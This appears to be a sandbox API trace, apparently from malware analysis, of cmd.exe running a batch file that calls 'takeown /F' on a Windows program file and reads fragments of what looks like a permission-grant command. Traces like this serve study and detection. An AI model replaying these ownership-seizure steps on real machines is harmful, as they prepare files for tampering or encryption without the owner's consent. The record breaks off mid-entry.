lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x14e908, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e908) returned 0xffffffff [0234.800] GetLastError () returned 0x2 [0234.800] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown", fInfoLevelId=0x1, lpFindFileData=0x14e908, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e908) returned 0xffffffff [0234.801] GetLastError () returned 0x2 [0234.801] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.801] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x14e908, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e908) returned 0x404af8 [0234.801] FindClose (in: hFindFile=0x404af8 | out: hFindFile=0x404af8) returned 1 [0234.802] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x14e908, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e908) returned 0xffffffff [0234.802] GetLastError () returned 0x2 [0234.802] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x14e908, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e908) returned 0x404af8 [0234.802] FindClose (in: hFindFile=0x404af8 | out: hFindFile=0x404af8) returned 1 [0234.803] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0234.803] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0234.803] GetConsoleTitleW (in: lpConsoleTitle=0x14ee00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.803] InitializeProcThreadAttributeList (in: lpAttributeList=0x14ec88, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14ed50 | out: lpAttributeList=0x14ec88, lpSize=0x14ed50) returned 1 [0234.803] UpdateProcThreadAttribute (in: lpAttributeList=0x14ec88, dwFlags=0x0, Attribute=0x60001, lpValue=0x14ed48, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14ec88, lpPreviousValue=0x0) returned 1 [0234.803] GetStartupInfoW (in: lpStartupInfo=0x14ec44 | out: lpStartupInfo=0x14ec44*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0234.804] lstrcmpW (lpString1="\\takeown.exe", lpString2="\\XCOPY.EXE") returned -1 [0234.804] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\takeown.exe", lpCommandLine="takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x14ece4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14ed30 | out: lpCommandLine="takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\"", lpProcessInformation=0x14ed30*(hProcess=0x78, hThread=0x74, dwProcessId=0x598, dwThreadId=0xb1c)) returned 1 [0236.780] CloseHandle (hObject=0x74) returned 1 [0236.780] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0236.780] GetProcessHeap () returned 0x3f0000 [0236.780] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x408198 | out: hHeap=0x3f0000) returned 1 [0236.780] GetEnvironmentStringsW () returned 0x405fb0* [0236.780] GetProcessHeap () returned 0x3f0000 [0236.780] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb5c) returned 0x408198 [0236.780] FreeEnvironmentStringsW (penv=0x405fb0) returned 1 [0236.780] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0239.551] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x14ec24 | out: lpExitCode=0x14ec24*=0x0) returned 1 [0239.552] CloseHandle (hObject=0x78) returned 1 [0239.552] _vsnwprintf (in: _Buffer=0x14ed6c, _BufferCount=0x13, _Format="%08X", _ArgList=0x14ec30 | out: _Buffer="00000000") returned 8 [0239.552] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0239.552] GetProcessHeap () returned 0x3f0000 [0239.552] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x408198 | out: hHeap=0x3f0000) returned 1 [0239.552] GetEnvironmentStringsW () returned 0x405fb0* [0239.552] GetProcessHeap () returned 0x3f0000 [0239.552] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb5c) returned 0x408198 [0239.552] FreeEnvironmentStringsW (penv=0x405fb0) returned 1 [0239.552] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0239.552] GetProcessHeap () returned 0x3f0000 [0239.552] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x408198 | out: hHeap=0x3f0000) returned 1 [0239.552] GetEnvironmentStringsW () returned 0x405fb0* [0239.552] GetProcessHeap () returned 0x3f0000 [0239.552] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb5c) returned 0x408198 [0239.552] FreeEnvironmentStringsW (penv=0x405fb0) returned 1 [0239.553] GetProcessHeap () returned 0x3f0000 [0239.553] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x3f0db8 | out: hHeap=0x3f0000) returned 1 [0239.553] DeleteProcThreadAttributeList (in: lpAttributeList=0x14ec88 | out: lpAttributeList=0x14ec88) [0239.553] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.553] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0239.553] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.553] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0239.554] _get_osfhandle (_FileHandle=0) returned 0x3 [0239.554] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0239.554] SetConsoleInputExeNameW () returned 0x1 [0239.554] GetConsoleOutputCP () returned 0x1b5 [0239.554] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0239.554] SetThreadUILanguage (LangId=0x0) returned 0x409 [0239.554] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14f4a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0239.555] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0239.555] _get_osfhandle (_FileHandle=3) returned 0x78 [0239.555] SetFilePointer (in: hFile=0x78, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0239.555] GetProcessHeap () returned 0x3f0000 [0239.555] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404a78 | out: hHeap=0x3f0000) returned 1 [0239.555] GetProcessHeap () returned 0x3f0000 [0239.555] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404948 | out: hHeap=0x3f0000) returned 1 [0239.555] GetProcessHeap () returned 0x3f0000 [0239.555] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404820 | out: hHeap=0x3f0000) returned 1 [0239.555] GetProcessHeap () returned 0x3f0000 [0239.555] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404d10 | out: hHeap=0x3f0000) returned 1 [0239.555] GetProcessHeap () returned 0x3f0000 [0239.555] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404780 | out: hHeap=0x3f0000) returned 1 [0239.555] GetProcessHeap () returned 0x3f0000 [0239.555] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404568 | out: hHeap=0x3f0000) returned 1 [0239.556] GetProcessHeap () returned 0x3f0000 [0239.556] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4044e8 | out: hHeap=0x3f0000) returned 1 [0239.556] GetProcessHeap () returned 0x3f0000 [0239.556] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4043b8 | out: hHeap=0x3f0000) returned 1 [0239.556] GetProcessHeap () returned 0x3f0000 [0239.556] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404290 | out: hHeap=0x3f0000) returned 1 [0239.556] GetProcessHeap () returned 0x3f0000 [0239.556] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404220 | out: hHeap=0x3f0000) returned 1 [0239.556] GetProcessHeap () returned 0x3f0000 [0239.556] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404190 | out: hHeap=0x3f0000) returned 1 [0239.556] GetProcessHeap () returned 0x3f0000 [0239.556] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x3f0ab8 | out: hHeap=0x3f0000) returned 1 [0239.556] GetProcessHeap () returned 0x3f0000 [0239.556] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x3f1250 | out: hHeap=0x3f0000) returned 1 [0239.556] _get_osfhandle (_FileHandle=3) returned 0x78 [0239.556] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0239.556] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14f488, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x14f488*=0xb3, lpOverlapped=0x0) returned 1 [0239.556] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0239.557] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=16, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0239.557] _get_osfhandle (_FileHandle=3) returned 0x78 [0239.557] GetFileType (hFile=0x78) returned 0x1 [0239.557] _get_osfhandle (_FileHandle=3) returned 0x78 [0239.557] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0239.558] GetProcessHeap () returned 0x3f0000 [0239.558] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x400a) returned 0x414b28 [0239.558] GetProcessHeap () returned 0x3f0000 [0239.558] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x7c) returned 0x404190 [0239.558] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp", nBufferLength=0x208, lpBuffer=0x14ec18, lpFilePart=0x14ec10 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp", lpFilePart=0x14ec10*="Shorthand.jtp") returned 0x38 [0239.558] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x14e92c | out: lpFindFileData=0x14e92c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x41dc500, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x41dc500, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x3f1250 [0239.558] FindClose (in: hFindFile=0x3f1250 | out: hFindFile=0x3f1250) returned 1 [0239.559] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0239.559] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal", lpFindFileData=0x14e92c | out: lpFindFileData=0x14e92c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xdae682e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdae682e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Journal", cAlternateFileName="WI0FCF~1")) returned 0x3f1250 [0239.559] FindClose (in: hFindFile=0x3f1250 | out: hFindFile=0x3f1250) returned 1 [0239.559] _wcsnicmp (_String1="WI0FCF~1", _String2="Windows Journal", _MaxCount=0xf) returned -62 [0239.559] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates", lpFindFileData=0x14e92c | out: lpFindFileData=0x14e92c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e472dd2, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa250a38, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e4e551f, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 0x3f1250 [0239.559] FindClose (in: hFindFile=0x3f1250 | out: hFindFile=0x3f1250) returned 1 [0239.559] _wcsnicmp (_String1="TEMPLA~1", _String2="Templates", _MaxCount=0x9) returned 10 [0239.559] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp", lpFindFileData=0x14e92c | out: lpFindFileData=0x14e92c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5739f06, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5739f06, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x48795fdf, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1575a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shorthand.jtp", cAlternateFileName="")) returned 0x3f1250 [0239.559] FindClose (in: hFindFile=0x3f1250 | out: hFindFile=0x3f1250) returned 1 [0239.559] GetProcessHeap () returned 0x3f0000 [0239.559] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x24) returned 0x3f1250 [0239.560] GetProcessHeap () returned 0x3f0000 [0239.560] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x414b28 | out: hHeap=0x3f0000) returned 1 [0239.562] _tell (_FileHandle=3) returned 63 [0239.562] _close (_FileHandle=3) returned 0 [0239.562] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14f25c | out: _Buffer="\r\n") returned 2 [0239.562] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.562] GetFileType (hFile=0x7) returned 0x2 [0239.562] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0239.562] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f21c | out: lpMode=0x14f21c) returned 1 [0239.563] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.563] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f248, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x14f248*=0x2) returned 1 [0239.565] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0239.565] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0239.565] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14f258 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0239.565] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14f258 | out: _Buffer=">") returned 1 [0239.565] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.565] GetFileType (hFile=0x7) returned 0x2 [0239.566] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0239.566] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f220 | out: lpMode=0x14f220) returned 1 [0239.567] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.567] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14f24c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x14f24c*=0x26) returned 1 [0239.578] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.578] GetFileType (hFile=0x7) returned 0x2 [0239.578] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0239.578] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f4a4 | out: lpMode=0x14f4a4) returned 1 [0239.578] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.578] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3f0dc0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14f4d0, lpReserved=0x0 | out: lpBuffer=0x3f0dc0*, lpNumberOfCharsWritten=0x14f4d0*=0x3) returned 1 [0239.579] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14f4dc | out: _Buffer=" FN=\"Shorthand.jtp\" ") returned 20 [0239.579] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.579] GetFileType (hFile=0x7) returned 0x2 [0239.579] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0239.579] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f49c | out: lpMode=0x14f49c) returned 1 [0239.580] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.580] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x14f4c8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x14f4c8*=0x14) returned 1 [0239.580] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14f4fc | out: _Buffer="\r\n") returned 2 [0239.580] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.580] GetFileType (hFile=0x7) returned 0x2 [0239.581] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0239.581] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f4bc | out: lpMode=0x14f4bc) returned 1 [0239.581] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.581] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14f4e8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x14f4e8*=0x2) returned 1 [0239.583] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0239.583] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0239.583] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0239.583] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0239.583] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0239.583] _wcsicmp (_String1="set", _String2="CD") returned 16 [0239.583] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0239.583] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0239.584] _wcsicmp (_String1="set", _String2="REN") returned 1 [0239.584] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0239.584] _wcsicmp (_String1="set", _String2="SET") returned 0 [0239.584] GetConsoleTitleW (in: lpConsoleTitle=0x14f06c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0239.585] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0239.585] SetEnvironmentVariableW (lpName="FN", lpValue="\"Shorthand.jtp\"") returned 1 [0239.585] GetProcessHeap () returned 0x3f0000 [0239.585] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x408198 | out: hHeap=0x3f0000) returned 1 [0239.585] GetEnvironmentStringsW () returned 0x406b40* [0239.585] GetProcessHeap () returned 0x3f0000 [0239.585] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb82) returned 0x4076d0 [0239.585] FreeEnvironmentStringsW (penv=0x406b40) returned 1 [0239.585] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.585] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0239.586] _get_osfhandle (_FileHandle=1) returned 0x7 [0239.586] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0239.586] _get_osfhandle (_FileHandle=0) returned 0x3 [0239.586] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0239.587] SetConsoleInputExeNameW () returned 0x1 [0239.587] GetConsoleOutputCP () returned 0x1b5 [0239.587] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0239.587] SetThreadUILanguage (LangId=0x0) returned 0x409 [0239.587] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14f4a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0239.588] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0239.588] _get_osfhandle (_FileHandle=3) returned 0x78 [0239.588] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0239.588] GetProcessHeap () returned 0x3f0000 [0239.588] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4042b0 | out: hHeap=0x3f0000) returned 1 [0239.588] GetProcessHeap () returned 0x3f0000 [0239.588] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404278 | out: hHeap=0x3f0000) returned 1 [0239.589] GetProcessHeap () returned 0x3f0000 [0239.589] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x3f1280 | out: hHeap=0x3f0000) returned 1 [0239.589] GetProcessHeap () returned 0x3f0000 [0239.589] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x3f0db8 | out: hHeap=0x3f0000) returned 1 [0239.589] GetProcessHeap () returned 0x3f0000 [0239.589] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404218 | out: hHeap=0x3f0000) returned 1 [0239.589] GetProcessHeap () returned 0x3f0000 [0239.589] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x3f1250 | out: hHeap=0x3f0000) returned 1 [0239.589] GetProcessHeap () returned 0x3f0000 [0239.589] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404190 | out: hHeap=0x3f0000) returned 1 [0239.589] _get_osfhandle (_FileHandle=3) returned 0x78 [0239.589] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0239.589] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14f488, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x14f488*=0xa3, lpOverlapped=0x0) returned 1 [0239.589] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0239.589] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0239.590] _get_osfhandle (_FileHandle=3) returned 0x78 [0239.590] GetFileType (hFile=0x78) returned 0x1 [0239.590] _get_osfhandle (_FileHandle=3) returned 0x78 [0239.590] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0239.590] GetProcessHeap () returned 0x3f0000 [0239.590] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x400a) returned 0x414b28 [0239.590] GetProcessHeap () returned 0x3f0000 [0239.590] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x70) returned 0x3f1250 [0239.590] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x208, lpBuffer=0x14ec18, lpFilePart=0x14ec10 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x14ec10*="Ch81ANBE.bat") returned 0x32 [0239.591] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14e92c | out: lpFindFileData=0x14e92c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x404190 [0239.591] FindClose (in: hFindFile=0x404190 | out: hFindFile=0x404190) returned 1 [0239.591] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x14e92c | out: lpFindFileData=0x14e92c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x404190 [0239.591] FindClose (in: hFindFile=0x404190 | out: hFindFile=0x404190) returned 1 [0239.591] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0239.591] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x14e92c | out: lpFindFileData=0x14e92c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, 